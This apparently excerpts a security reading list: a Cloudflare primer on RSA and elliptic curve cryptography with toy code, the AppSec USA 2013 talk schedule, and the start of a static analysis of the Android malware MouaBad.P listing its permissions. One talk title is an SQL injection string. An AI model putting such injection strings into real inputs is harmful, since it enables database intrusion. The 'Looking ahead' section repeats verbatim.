What you need for a public key cryptographic system to work is a set of algorithms that is easy to process in one direction, but difficult to undo. In the case of RSA, the easy algorithm multiplies two prime numbers. If multiplication is the easy algorithm, its difficult pair algorithm is factoring the product of the multiplication into its two component primes. Algorithms that have this characteristic — easy in one direction, hard the other — are known as Trapdoor Functions. Finding a good Trapdoor Function is critical to making a secure public key cryptographic system. Simplistically: the bigger the spread between the difficulty of going one direction in a Trapdoor Function and going the other, the more secure a cryptographic system based on it will be.

A toy RSA algorithm

The RSA algorithm is the most popular and best understood public key cryptography system. Its security relies on the fact that factoring is slow and multiplication is fast.
What follows is a quick walk-through of what a small RSA system looks like and how it works.

In general, a public key encryption system has two components, a public key and a private key. Encryption works by taking a message and applying a mathematical operation to it to get a random-looking number. Decryption takes the random-looking number and applies a different operation to get back to the original number. Encryption with the public key can only be undone by decrypting with the private key.

Computers don't do well with arbitrarily large numbers. We can make sure that the numbers we are dealing with do not get too large by choosing a maximum number and only dealing with numbers less than the maximum. We can treat the numbers like the numbers on an analog clock. Any calculation that results in a number larger than the maximum gets wrapped around to a number in the valid range.

In RSA, this maximum value (call it max) is obtained by multiplying two random prime numbers. The public and private keys are two specially chosen numbers that are greater than zero and less than the maximum value, call them pub and priv. To encrypt a number you multiply it by itself pub times, making sure to wrap around when you hit the maximum. To decrypt a message, you multiply it by itself priv times and you get back to the original number. It sounds surprising, but it actually works. This property was a big breakthrough when it was discovered.

To create a RSA key pair, first randomly pick the two prime numbers to obtain the maximum (max). Then pick a number to be the public key pub. As long as you know the two prime numbers, you can compute a corresponding private key priv from this public key. This is how factoring relates to breaking RSA — factoring the maximum number into its component primes allows you to compute someone's private key from the public key and decrypt their private messages.

Let's make this more concrete with an example. Take the prime numbers 13 and 7; their product gives us our maximum value of 91. Let's take our public encryption key to be the number 5. Then using the fact that we know 7 and 13 are the factors of 91 and applying an algorithm called the Extended Euclidean Algorithm, we get that the private key is the number 29.

These parameters (max: 91, pub: 5, priv: 29) define a fully functional RSA system. You can take a number and multiply it by itself 5 times to encrypt it, then take that number and multiply it by itself 29 times and you get the original number back.

Let's use these values to encrypt the message "CLOUD". In order to represent a message mathematically we have to turn the letters into numbers. A common representation of the Latin alphabet is UTF-8. Each character corresponds to a number. Under this encoding, CLOUD is 67, 76, 79, 85, 68. Each of these digits is smaller than our maximum of 91, so we can encrypt them individually.

Let's start with the first letter. We have to multiply it by itself 5 times to get the encrypted value:

67×67 = 4489 = 30*

*Since 4489 is larger than max, we have to wrap it around. We do that by dividing by 91 and taking the remainder: 4489 = 91×49 + 30

30×67 = 2010 = 8
8×67 = 536 = 81
81×67 = 5427 = 58

This means the encrypted version of 67 is 58.

Repeating the process for each of the letters, we get that the encrypted message CLOUD becomes: 58, 20, 53, 50, 87.

To decrypt this scrambled message, we take each number and multiply it by itself 29 times:

58×58 = 3364 = 88 (remember, we wrap around when the number is greater than max)
88×58 = 5104 = 8
…
9×58 = 522 = 67

Voila, we're back to 67. This works with the rest of the digits, resulting in the original message. The takeaway is that you can take a number, multiply it by itself a number of times to get a random-looking number, then multiply that number by itself a secret number of times to get back to the original number.
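The same walkthrough fits in a few lines of Python. This is a minimal sketch of the toy system above (max = 91, pub = 5, priv = 29), and it even derives priv from the two primes via a modular inverse, which is the Extended Euclidean Algorithm step mentioned earlier. It is of course not secure RSA:

# Toy RSA with the parameters from the text: primes 7 and 13.
p, q = 7, 13
max_n = p * q            # 91, the "maximum" (modulus)
pub = 5                  # public exponent

# Derive the private exponent as the modular inverse of pub mod (p-1)(q-1).
# pow(..., -1, ...) requires Python 3.8+.
priv = pow(pub, -1, (p - 1) * (q - 1))
assert priv == 29

def encrypt(m):
    return pow(m, pub, max_n)   # multiply m by itself pub times, wrapping at max

def decrypt(c):
    return pow(c, priv, max_n)  # multiply c by itself priv times, wrapping at max

message = [ord(ch) for ch in "CLOUD"]        # [67, 76, 79, 85, 68]
ciphertext = [encrypt(m) for m in message]
print(ciphertext)                            # [58, 20, 53, 50, 87]
print("".join(chr(decrypt(c)) for c in ciphertext))  # CLOUD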
Not a perfect Trapdoor

RSA and Diffie-Hellman were so powerful because they came with rigorous security proofs. The authors proved that breaking the system is equivalent to solving a mathematical problem that is thought to be difficult to solve. Factoring is a very well known problem and has been studied since antiquity (see Sieve of Eratosthenes). Any breakthroughs would be big news and would net the discoverer a significant financial windfall.

"Find factors, get money" - Notorious T.K.G. (Reuters)

That said, factoring is not the hardest problem on a bit for bit basis. Specialized algorithms like the Quadratic Sieve and the General Number Field Sieve were created to tackle the problem of prime factorization and have been moderately successful. These algorithms are faster and less computationally intensive than the naive approach of just guessing pairs of known primes. These factoring algorithms get more efficient as the size of the numbers being factored gets larger. The gap between the difficulty of factoring large numbers and multiplying large numbers is shrinking as the number (i.e. the key's bit length) gets larger. As the resources available to decrypt numbers increase, the size of the keys needs to grow even faster. This is not a sustainable situation for mobile and low-powered devices that have limited computational power. The gap between factoring and multiplying is not sustainable in the long term.

All this means is that RSA is not the ideal system for the future of cryptography. In an ideal Trapdoor Function, the easy way and the hard way get harder at the same rate with respect to the size of the numbers in question. We need a public key system based on a better Trapdoor.

Elliptic curves: Building blocks of a better Trapdoor

After the introduction of RSA and Diffie-Hellman, researchers explored other mathematics-based cryptographic solutions looking for other algorithms beyond factoring that would serve as good Trapdoor Functions. In 1985, cryptographic algorithms were proposed based on an esoteric branch of mathematics called elliptic curves.

But what exactly is an elliptic curve and how does the underlying Trapdoor Function work? Unfortunately, unlike factoring — something we all had to do for the first time in middle school — most people aren't as familiar with the math around elliptic curves. The math isn't as simple, nor is explaining it, but I'm going to give it a go over the next few sections. (If your eyes start to glaze over, you can skip way down to the section: What does it all mean.)

An elliptic curve is the set of points that satisfy a specific mathematical equation.
The equation for an elliptic curve looks something like this:

y² = x³ + ax + b

That graphs to something that looks a bit like the Lululemon logo tipped on its side:

There are other representations of elliptic curves, but technically an elliptic curve is the set of points satisfying an equation in two variables with degree two in one of the variables and three in the other. An elliptic curve is not just a pretty picture, it also has some properties that make it a good setting for cryptography.

Strange symmetry

Take a closer look at the elliptic curve plotted above. It has several interesting properties. One of these is horizontal symmetry. Any point on the curve can be reflected over the x axis and remain the same curve. A more interesting property is that any non-vertical line will intersect the curve in at most three places.

Let's imagine this curve as the setting for a bizarre game of billiards. Take any two points on the curve and draw a line through them; it will intersect the curve at exactly one more place. In this game of billiards, you take a ball at point A and shoot it towards point B. When it hits the curve, the ball bounces either straight up (if it's below the x-axis) or straight down (if it's above the x-axis) to the other side of the curve.

We can call this billiards move on two points "dot." Any two points on a curve can be dotted together to get a new point.

A dot B = C

We can also string moves together to "dot" a point with itself over and over.

A dot A = B
A dot B = C
A dot C = D
...

It turns out that if you have two points, an initial point "dotted" with itself n times to arrive at a final point, finding out n when you only know the final point and the first point is hard. To continue our bizarro billiards metaphor, imagine one person plays our game alone in a room for a random period of time. It is easy for him to hit the ball over and over following the rules described above. If someone walks into the room later and sees where the ball has ended up, even if they know all the rules of the game and where the ball started, they cannot determine the number of times the ball was struck to get there without running through the whole game again until the ball gets to the same point. Easy to do, hard to undo: this is the basis for a very good Trapdoor Function.

Let's get weird

This simplified curve above is great to look at and explain the general concept of elliptic curves, but it doesn't represent what the curves used for cryptography look like. For this, we have to restrict ourselves to numbers in a fixed range, like in RSA. Rather than allow any value for the points on the curve, we restrict ourselves to whole numbers in a fixed range. When computing the formula for the elliptic curve (y² = x³ + ax + b), we use the same trick of rolling over numbers when we hit the maximum. If we pick the maximum to be a prime number, the elliptic curve is called a prime curve and has excellent cryptographic properties.

Here's an example of a curve (y² = x³ - x + 1) plotted for all numbers:

Here's the plot of the same curve with only the whole number points represented with a maximum of 97:

This hardly looks like a curve in the traditional sense, but it is. It's like the original curve was wrapped around at the edges and only the parts of the curve that hit whole number coordinates are colored in. You can even still see the horizontal symmetry.

In fact, you can still play the billiards game on this curve and dot points together. The equation for a line on the curve still has the same properties.
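To make the "dot" operation concrete, here is a minimal Python sketch of point addition and repeated dotting (scalar multiplication) on the prime curve from the text, y² = x³ - x + 1 with a maximum of 97. The starting point (1, 1) is an arbitrary choice for the demo; only the curve parameters come from the article, everything else is illustrative:

# Curve from the text: y^2 = x^3 + A*x + B mod P_MOD, with A = -1, B = 1.
P_MOD, A, B = 97, -1, 1

def ec_add(p1, p2):
    # "Dot" two points: draw the line through them, take the third
    # intersection with the curve, and reflect it over the x-axis.
    if p1 is None: return p2     # None plays the role of the point at infinity
    if p2 is None: return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return None              # vertical line: result is the point at infinity
    if p1 == p2:                 # tangent line when doubling a point
        s = (3 * x1 * x1 + A) * pow(2 * y1, -1, P_MOD) % P_MOD
    else:                        # secant line through two distinct points
        s = (y2 - y1) * pow(x2 - x1, -1, P_MOD) % P_MOD
    x3 = (s * s - x1 - x2) % P_MOD
    return (x3, (s * (x1 - x3) - y1) % P_MOD)

def ec_mul(k, pt):
    # Dot a point with itself repeatedly (double-and-add).
    out = None
    while k:
        if k & 1: out = ec_add(out, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return out

def y_for_x(x):
    # Brute-force solve y^2 = x^3 + A*x + B mod 97; fine for a toy field.
    return [y for y in range(P_MOD) if (y * y - (x**3 + A * x + B)) % P_MOD == 0]

G = (1, 1)                 # 1^2 = 1^3 - 1 + 1, so (1, 1) is on the curve
print(ec_mul(2, G))        # (96, 1): G dotted with itself once
priv = 20                  # toy private key
print(ec_mul(priv, G))     # toy public key: G dotted with itself priv times
print(y_for_x(70))         # [6, 91]: matches the article's message point (70, 6)

Recovering priv from the public point here is trivial because the field is tiny; with the enormous maximums used in practice, that recovery is the elliptic curve discrete logarithm problem described below.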
Moreover, the dot operation can be efficiently computed. You can visualize the line between two points as a line that wraps around at the borders until it hits a point. It's as if in our bizarro billiards game, when a ball hits the edge of the board (the max) it is magically transported to the opposite side of the table and continues on its path until reaching a point, kind of like the game Asteroids.

With this new curve representation, you can take messages and represent them as points on the curve. You could imagine taking a message and setting it as the x coordinate, and solving for y to get a point on the curve. It is slightly more complicated than this in practice, but this is the general idea. You get the points (70,6), (76,48), -, (82,6), (69,22)*.

*There are no coordinates with 65 for the x value; this can be avoided in the real world.

An elliptic curve cryptosystem can be defined by picking a prime number as a maximum, a curve equation and a public point on the curve. A private key is a number priv, and a public key is the public point dotted with itself priv times. Computing the private key from the public key in this kind of cryptosystem is called the elliptic curve discrete logarithm function. This turns out to be the Trapdoor Function we were looking for.

What does it all mean?

The elliptic curve discrete logarithm is the hard problem underpinning elliptic curve cryptography. Despite almost three decades of research, mathematicians still haven't found an algorithm to solve this problem that improves upon the naive approach. In other words, unlike with factoring, based on currently understood mathematics there doesn't appear to be a shortcut that is narrowing the gap in a Trapdoor Function based around this problem. This means that for numbers of the same size, solving elliptic curve discrete logarithms is significantly harder than factoring. Since a more computationally intensive hard problem means a stronger cryptographic system, it follows that elliptic curve cryptosystems are harder to break than RSA and Diffie-Hellman.

To visualize how much harder it is to break, Lenstra recently introduced the concept of "Global Security." You can compute how much energy is needed to break a cryptographic algorithm, and compare that with how much water that energy could boil. This is a kind of cryptographic carbon footprint. By this measure, breaking a 228-bit RSA key requires less energy than it takes to boil a teaspoon of water. Comparatively, breaking a 228-bit elliptic curve key requires enough energy to boil all the water on earth. For this level of security with RSA, you'd need a key with 2,380 bits.

With ECC, you can use smaller keys to get the same levels of security. Small keys are important, especially in a world where more and more cryptography is done on less powerful devices like mobile phones. While multiplying two prime numbers together is easier than factoring the product into its component parts, when the prime numbers start to get very long even just the multiplication step can take some time on a low powered device. While you could likely continue to keep RSA secure by increasing the key length, that comes with a cost of slower cryptographic performance on the client. ECC appears to offer a better tradeoff: high security with short, fast keys.

Elliptic curves in action

After a slow start, elliptic curve based algorithms are gaining popularity and the pace of adoption is accelerating. Elliptic curve cryptography is now used in a wide variety of applications: the U.S.
government uses it to protect internal communications, the Tor project uses it to help assure anonymity, it is the mechanism used to prove ownership of bitcoins, it provides signatures in Apple's iMessage service, it is used to encrypt DNS information with DNSCurve, and it is the preferred method for authentication for secure web browsing over SSL/TLS. CloudFlare uses elliptic curve cryptography to provide perfect forward secrecy, which is essential for online privacy. First generation cryptographic algorithms like RSA and Diffie-Hellman are still the norm in most arenas, but elliptic curve cryptography is quickly becoming the go-to solution for privacy and security online.

If you are accessing the HTTPS version of this blog (https://blog.cloudflare.com) from a recent enough version of Chrome or Firefox, your browser is using elliptic curve cryptography. You can check this yourself. In Chrome, you can click on the lock in the address bar and go to the connection tab to see which cryptographic algorithms were used in establishing the secure connection. Clicking on the lock in Chrome 30 should show the following image.

The relevant portion of this text to this discussion is ECDHE_RSA. ECDHE stands for Elliptic Curve Diffie Hellman Ephemeral and is a key exchange mechanism based on elliptic curves. This algorithm is used by CloudFlare to provide perfect forward secrecy in SSL. The RSA component means that RSA is used to prove the identity of the server. We use RSA because CloudFlare's SSL certificate is bound to an RSA key pair. Modern browsers also support certificates based on elliptic curves. If CloudFlare's SSL certificate were an elliptic curve certificate, this part of the page would state ECDHE_ECDSA. The proof of the identity of the server would be done using ECDSA, the Elliptic Curve Digital Signature Algorithm.

CloudFlare's ECC curve for ECDHE (this is the same curve used by Google.com):

max: 115792089210356248762697446949407573530086143415290314195533631308867097853951
curve: y² = x³ + ax + b
a = 115792089210356248762697446949407573530086143415290314195533631308867097853948
b = 41058363725152142129326129780047268409114441015993725554835256314039467401291

The performance improvement of ECDSA over RSA is dramatic. Even with an older version of OpenSSL that does not have assembly-optimized elliptic curve code, an ECDSA signature with a 256-bit key is over 20x faster than an RSA signature with a 2,048-bit key. On a MacBook Pro with OpenSSL 0.9.8, the "speed" benchmark returns:

Doing 256 bit sign ecdsa's for 10s: 42874 256 bit ECDSA signs in 9.99s
Doing 2048 bit private rsa's for 10s: 1864 2048 bit private RSA's in 9.99s

That's 23x as many signatures using ECDSA as RSA. CloudFlare is constantly looking to improve SSL performance. Just this week, CloudFlare started using an assembly-optimized version of ECC that more than doubles the speed of ECDHE. Using elliptic curve cryptography saves time, power and computational resources for both the server and the browser, helping us make the web both faster and more secure.
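To see why a Diffie-Hellman exchange works on elliptic curves at all, here is a toy sketch on the same tiny curve from the earlier example (the helpers are repeated so the snippet runs on its own). Real ECDHE uses the P-256 parameters above plus a fresh ephemeral key pair per session; this demo is in no way secure:

import random

# Same toy curve as before: y^2 = x^3 - x + 1 mod 97.
P_MOD, A = 97, -1

def ec_add(p1, p2):
    if p1 is None: return p2
    if p2 is None: return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return None
    if p1 == p2:
        s = (3 * x1 * x1 + A) * pow(2 * y1, -1, P_MOD) % P_MOD
    else:
        s = (y2 - y1) * pow(x2 - x1, -1, P_MOD) % P_MOD
    x3 = (s * s - x1 - x2) % P_MOD
    return (x3, (s * (x1 - x3) - y1) % P_MOD)

def ec_mul(k, pt):
    out = None
    while k:
        if k & 1: out = ec_add(out, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return out

G = (1, 1)                                   # agreed-upon public point

alice_priv = random.randint(1, 96)           # Alice's secret scalar
bob_priv = random.randint(1, 96)             # Bob's secret scalar
alice_pub = ec_mul(alice_priv, G)            # sent over the wire
bob_pub = ec_mul(bob_priv, G)                # sent over the wire

# Each side dots the other's public point with its own secret scalar;
# both land on the same shared point because a*(b*G) = b*(a*G). An
# eavesdropper seeing only the public points must solve the elliptic
# curve discrete logarithm to recover it.
assert ec_mul(alice_priv, bob_pub) == ec_mul(bob_priv, alice_pub)
print(ec_mul(alice_priv, bob_pub))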
The downside

It is not all roses in the world of elliptic curves; there have been some questions and uncertainties that have held them back from being fully embraced by everyone in the industry.

One point that has been in the news recently is the Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG). This is a random number generator standardized by the National Institute of Standards and Technology (NIST) and promoted by the NSA. Dual_EC_DRBG generates random-looking numbers using the mathematics of elliptic curves. The algorithm itself involves taking points on a curve and repeatedly performing an elliptic curve "dot" operation. After publication it was reported that it could have been designed with a backdoor, meaning that the sequence of numbers returned could be fully predicted by someone with the right secret number. Recently, the company RSA recalled several of their products because this random number generator was set as the default PRNG for their line of security products.

Whether or not this random number generator was written with a backdoor does not change the strength of the elliptic curve technology itself, but it does raise questions about the standardization process for elliptic curves. As we've written about before, it's also part of the reason that attention should be spent to ensuring that your system is using adequately random numbers. In a future blog post, we will go into how a backdoor could be snuck into the specification of this algorithm.

Some of the more skeptical cryptographers in the world now have a general distrust for NIST itself and the standards it has published that were supported by the NSA. Almost all of the widely implemented elliptic curves fall into this category. There are no known attacks on these special curves, chosen for their efficient arithmetic; however, bad curves do exist and some feel it is better to be safe than sorry. There has been progress in developing curves with efficient arithmetic outside of NIST, including Curve25519 created by Daniel Bernstein (djb) and more recently computed curves by Paulo Barreto and collaborators, though widespread adoption of these curves is several years away. Until these non-traditional curves are implemented by browsers, they won't be able to be used for securing cryptographic transport on the web.

Another uncertainty about elliptic curve cryptography is related to patents. There are over 130 patents that cover specific uses of elliptic curves owned by BlackBerry (through their 2009 acquisition of Certicom). Many of these patents were licensed for use by private organizations and even the NSA. This has given some developers pause over whether their implementations of ECC infringe upon this patent portfolio. In 2007, Certicom filed suit against Sony for some uses of elliptic curves; however, that lawsuit was dismissed in 2009. There are now many implementations of elliptic curve cryptography that are thought to not infringe upon these patents and are in wide use.

The ECDSA digital signature has a drawback compared to RSA in that it requires a good source of entropy. Without proper randomness, the private key could be revealed. A flaw in the random number generator on Android allowed hackers to find the ECDSA private key used to protect the bitcoin wallets of several people in early 2013. Sony's PlayStation implementation of ECDSA had a similar vulnerability. A good source of random numbers is needed on the machine making the signatures. Dual_EC_DRBG is not recommended.

Looking ahead

Even with the above cautions, the advantages of elliptic curve cryptography over traditional RSA are widely accepted. Many experts are concerned that the mathematical algorithms behind RSA and Diffie-Hellman could be broken within 5 years, leaving ECC as the only reasonable alternative. Elliptic curves are supported by all modern browsers, and most certification authorities offer elliptic curve certificates.
Looking ahead

Even with the above cautions, the advantages of elliptic curve cryptography over traditional RSA are widely accepted. Many experts are concerned that the mathematical algorithms behind RSA and Diffie-Hellman could be broken within 5 years, leaving ECC as the only reasonable alternative. Elliptic curves are supported by all modern browsers, and most certification authorities offer elliptic curve certificates.

Every SSL connection for a CloudFlare-protected site will default to ECC on a modern browser. Soon, CloudFlare will allow customers to upload their own elliptic curve certificates. This will allow ECC to be used for identity verification as well as for securing the underlying message, speeding up HTTPS sessions across the board. More on this when the feature becomes available.

Source: A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography | CloudFlare Blog
  9. AppSec USA 2013 - Presentations

NOVEMBER 20 • WEDNESDAY

8:30AM – 8:50AM Welcome to OWASP AppSecUSA – Updates. Speakers: Tom Brennan, Peter Dean, Israel Bryski
9:00AM – 9:50AM Keynote: Computer and Network Security: I Think We Can Win! Speakers: William Cheswick
10:00AM – 10:50AM Hardening Windows 8 apps for the Windows Store. Speakers: Bill Sempf
10:00AM – 10:50AM The Perilous Future of Browser Security. Speakers: Robert Hansen
10:00AM – 10:50AM Automation Domination. Speakers: Brandon Spruth
10:00AM – 10:50AM How To Stand Up an AppSec Program – Lessons from the Trenches. Speakers: Joe Friedman
10:00AM – 10:50AM PANEL: Aim-Ready-Fire. Moderator: Wendy Nather. Speakers: Ajoy Kumar, Pravir Chandra, Suprotik Ghose, Jason Rothhaupt, Ramin Safai, Sean Barnum
10:00AM – 10:50AM Project Talk: Project Leader Workshop. Speakers: Samantha Groves
11:00AM – 11:50AM From the Trenches: Real-World Agile SDLC. Speakers: Chris Eng
11:00AM – 11:50AM Securing Cyber-Physical Application Software. Speakers: Warren Axelrod
11:00AM – 11:50AM Why is SCADA Security an Uphill Battle? Speakers: Amol Sarwate
11:00AM – 11:50AM Computer Crime Laws. Speakers: Tor Ekeland, Attorney
11:00AM – 11:50AM Can AppSec Training Really Make a Smarter Developer? Speakers: John Dickson
11:00AM – 11:50AM Project Talk: OWASP Enterprise Security API Project. Speakers: Chris Schmidt, Kevin Wall
12:00PM – 12:50PM All the network is a stage, and the APKs merely players: Scripting Android Applications. Speakers: Daniel Peck
12:00PM – 12:50PM BASHing iOS Applications: dirty, s*xy, cmdline tools for mobile auditors. Speakers: Jason Haddix, Dawn Isabel
12:00PM – 12:50PM Case Study: 10 Steps to Agile Development without Compromising Enterprise Security. Speakers: Yair Rovek
12:00PM – 12:50PM Build but don't break: Lessons in Implementing HTTP Security Headers. Speakers: Kenneth Lee
12:00PM – 12:50PM The Cavalry Is Us: Protecting the public good. Speakers: Josh Corman, Nicholas J. Percoco
1:00PM – 1:50PM Mantra OS: Because The World is Cruel. Speakers: Greg Disney-Leugers
1:00PM – 1:50PM Open Mic – Birds of a Feather –> Cavalry. Speakers: Josh Corman, Nicholas J. Percoco
1:00PM – 1:50PM HTML5: Risky Business or Hidden Security Tool Chest? Speakers: Johannes Ullrich
1:00PM – 1:50PM A Framework for Android Security through Automation in Virtual Environments. Speakers: Parth Patel
1:00PM – 1:50PM 2013 AppSec Guide and CISO Survey: Making OWASP Visible to CISOs. Speakers: Marco Morana, Tobias Gondrom
1:00PM – 1:50PM PANEL: Privacy or Security: Can We Have Both? Moderator: Jeff Fox. Speakers: Jim Manico, James Elste, Jack Radigan, Amy Neustein, Joseph Concannon, Steven Rambam
1:00PM – 1:50PM Project Talk: OWASP OpenSAMM Project. Speakers: Seba Deleersnyder, Pravir Chandra
2:00PM – 2:50PM Javascript libraries (in)security: A showcase of reckless uses and unwitting misuses. Speakers: Stefano Di Paola
2:00PM – 2:50PM Revenge of the Geeks: Hacking Fantasy Sports Sites. Speakers: Dan Kuykendall
2:00PM – 2:50PM What You Didn't Know About XML External Entities Attacks. Speakers: Timothy Morgan
2:00PM – 2:50PM Open Mic: Making the CWE Approachable for AppSec Newcomers. Speakers: Hassan Radwan
2:00PM – 2:50PM "What Could Possibly Go Wrong?" – Thinking Differently About Security. Speakers: Mary Ann Davidson
2:00PM – 2:50PM PANEL: Cybersecurity and Media: All the News That's Fit to Protect? Moderator: Dylan Tweney. Speakers: Rajiv Pant, Gordon Platt, Space Rogue, Michael Carbone, Nico Sell
2:00PM – 2:50PM Project Talk: The OWASP Education Projects. Speakers: Konstantinos Papapanagiotou, Martin Knobloch
3:00PM – 3:50PM Advanced Mobile Application Code Review Techniques. Speakers: sreenarayan a
3:00PM – 3:50PM OWASP Zed Attack Proxy. Speakers: Simon Bennetts
3:00PM – 3:50PM Open Mic: FERPAcolypse NOW! – Lessons Learned from an inBloom Assessment. Speakers: Mark Major
3:00PM – 3:50PM Pushing CSP to PROD: Case Study of a Real-World Content-Security Policy Implementation. Speakers: Brian Holyfield, Erik Larsson
3:00PM – 3:50PM Making the Future Secure with Java. Speakers: Milton Smith
3:00PM – 3:50PM PANEL: Mobile Security 2.0: Beyond BYOD. Moderator: Stephen Wellman. Speakers: Devindra Hardawar, Daniel Miessler, Jason Rouse
3:00PM – 3:50PM Project Talk: OWASP AppSensor Project. Speakers: John Melton, Dennis Groves
4:00PM – 4:50PM OWASP Top Ten Proactive Controls. Speakers: Jim Manico
4:00PM – 4:50PM Open Mic: Struts Ognl – Vulnerabilities Discovery and Remediation. Speakers: Eric Kobrin
4:00PM – 4:50PM Big Data Intelligence (Harnessing Petabytes of WAF statistics to Analyze & Improve Web Protection in the Cloud). Speakers: Ory Segal, Tsvika Klein
4:00PM – 4:50PM Forensic Investigations of Web Exploitations. Speakers: Ondrej Krehel
4:00PM – 4:50PM Sandboxing JavaScript via Libraries and Wrappers. Speakers: Phu Phung
4:00PM – 4:50PM Tagging Your Code with a Useful Assurance Label. Speakers: Robert Martin, Sean Barnum

NOVEMBER 21 • THURSDAY

9:00AM – 9:50AM ') UNION SELECT `This_Talk` AS ('New Exploitation and Obfuscation Techniques')%00. Speakers: Roberto Salgado
9:00AM – 9:50AM Defeating XSS and XSRF using JSF Based Frameworks. Speakers: Steve Wolf
9:00AM – 9:50AM Contain Yourself: Building Secure Containers for Mobile Devices. Speakers: Ronald Gutierrez
9:00AM – 9:50AM Mobile app analysis with Santoku Linux. Speakers: Hoog Andrew
9:00AM – 9:50AM AppSec at DevOps Speed and Portfolio Scale. Speakers: Jeff Williams
9:00AM – 10:00AM OWN THE CON: How we organized AppSecUSA – come learn how you can do it too. Speakers: Tom Brennan, Sarah Baso, Peter Dean, Israel Bryski
10:00AM – 10:50AM Open Mic: OpenStack Swift – Cloud Security. Speakers: Rodney Beede
10:00AM – 10:50AM iOS Application Defense – iMAS. Speakers: Gregg Ganley
10:00AM – 10:50AM PiOSoned POS – A Case Study in iOS based Mobile Point-of-Sale gone wrong. Speakers: Mike Park
10:00AM – 10:50AM Accidental Abyss: Data Leakage on The Internet. Speakers: Kelly FitzGerald
10:00AM – 10:50AM Leveraging OWASP in Open Source Projects – CAS AppSec Working Group. Speakers: Bill Thompson, Aaron Weaver, David Ohsie
10:00AM – 11:50AM Project Talk and Training: OWASP O2 Platform. Speakers: Dinis Cruz
11:00AM – 11:50AM OWASP Hackademic: a practical environment for teaching application security. Speakers: Konstantinos Papapanagiotou
11:00AM – 11:50AM An Introduction to the Newest Addition to the OWASP Top 10: Experts Break Down the New Guideline and Provide Guidance on Good Component Practice. Speakers: Ryan Berg
11:00AM – 11:50AM Verify your software for security bugs. Speakers: Simon Roses Femerling
11:00AM – 11:50AM Open Mic: Password Breaches – Why They Impact Your App Security When Other WebApps Are Breached. Speakers: Michael Coates
11:00AM – 11:50AM The State Of Website Security And The Truth About Accountability and "Best-Practices", Full Report. Speakers: Jeremiah Grossman
12:00PM – 12:50PM Open Mic: What Makes OWASP Japan Special. Speakers: Riotaro OKADA
12:00PM – 12:50PM Insecure Expectations. Speakers: Matt Konda
12:00PM – 12:50PM OWASP Periodic Table of Vulnerabilities. Speakers: James Landis
12:00PM – 12:50PM Application Security: Everything we know is wrong. Speakers: Eoin Keary
12:00PM – 12:50PM PANEL: Women in Information Security: Who Are We? Where Are We Going? Moderator: Joan Goodchild. Speakers: Dawn-Marie Hutchinson, Valene Skerpac, Carrie Schaper, Gary Phillips
12:00PM – 12:50PM Project Talk: OWASP Testing Guide. Speakers: Andrew Mueller, Matteo Meucci
1:00PM – 1:50PM Hack.me: a new way to learn web application security. Speakers: Armando Romeo
1:00PM – 1:50PM Hacking Web Server Apps for iOS. Speakers: Bruno Oliviera
1:00PM – 1:50PM Open Mic: Vision of the Software Assurance Market (SWAMP)
1:00PM – 1:50PM NIST – Missions and impacts to US industry, economy and citizens. Speakers: James St. Pierre, Rick Kuhn
1:00PM – 1:50PM PANEL: Wait Wait… Don't Pwn Me! Moderator: Mark Miller. Speakers: Josh Corman, Chris Eng, Space Rogue, Gal Shpantzer
1:00PM – 1:50PM Project Talk: OWASP Development Guide. Speakers: Andrew van der Stock
2:00PM – 2:50PM Buried by time, dust and BeEF. Speakers: Michele Orru
2:00PM – 2:50PM Go Fast AND Be Secure: Eliminating Application Risk in the Era of Modern, Component-Based Development. Speakers: Jeff Williams, Ryan Berg
2:00PM – 2:50PM Modern Attacks on SSL/TLS: Let the BEAST of CRIME and TIME be not so LUCKY. Speakers: Pratik Guha Sarkar, Shawn Fitzgerald
2:00PM – 2:50PM OWASP Broken Web Applications (OWASP BWA): Beyond 1.0. Speakers: Chuck Willis
2:00PM – 2:50PM Open Mic: Practical Cyber Threat Intelligence with STIX. Speakers: Sean Barnum
2:00PM – 2:50PM Project Talk: OWASP Security Principles Project. Speakers: Dennis Groves
3:00PM – 3:30PM Open Mic: About OWASP. Speakers: Sarah Baso, Michael Coates
3:00PM – 3:50PM HTTP Time Bandit. Speakers: Vaagn Toukharian
3:00PM – 3:50PM Wassup MOM? Owning the Message Oriented Middleware. Speakers: Gursev Singh Kalra
3:00PM – 3:50PM The 2013 OWASP Top 10. Speakers: Dave Wichers
3:00PM – 3:50PM CSRF: not all defenses are created equal. Speakers: Ari Elias-Bachrach
3:00PM – 3:50PM Project Talk: OWASP Code Review Guide. Speakers: Larry Conklin
3:30PM – 4:00PM Bug Bounty – Group Hack. Speakers: Tom Brennan, Casey Ellis
4:00PM – 5:00PM Award Ceremony. Speakers: Tom Brennan, Peter Dean

Source: Presentations | AppSec USA 2013
  10. Dissection of Android malware MouaBad.P

In Zscaler's daily scanning for mobile malware, we came across a sample of Android Mouabad.p. Let's see what's inside.

Application static info:

Package name = com.android.service
Version name = 1.00.11
SDK version: 7
Size: 40 kb

Permissions:

android.permission.INTERNET
android.permission.ACCESS_NETWORK_STATE
android.permission.READ_PHONE_STATE
android.permission.SET_WALLPAPER
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.MOUNT_UNMOUNT_FILESYSTEMS
android.permission.RECEIVE_SMS
android.permission.SEND_SMS
android.permission.RECEIVE_WAP_PUSH
android.permission.READ_PHONE_STATE
android.permission.WRITE_APN_SETTINGS
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.WAKE_LOCK
android.permission.DEVICE_POWER
android.permission.SEND_SMS
android.permission.WRITE_APN_SETTINGS
android.permission.CHANGE_NETWORK_STATE
android.permission.READ_SMS
android.permission.READ_CONTACTS
android.permission.WRITE_CONTACTS
android.permission.CALL_PHONE
android.permission.INTERNE
android.permission.MODIFY_PHONE_STATE

Used features:

android.hardware.telephony
android.hardware.touchscreen

Services:

com.android.service.MessagingService
com.android.service.ListenService

Receivers:

com.android.receiver.PlugScreenRecevier
com.android.receiver.PlugLockRecevier
com.android.receiver.BootReceiver
com.android.receiver.ScreenReceiver

Virustotal scan: https://www.virustotal.com/en/file/1b47265eab3752a7d64a64f570e166a2114e41f559fa468547e6fa917cf64256/analysis/
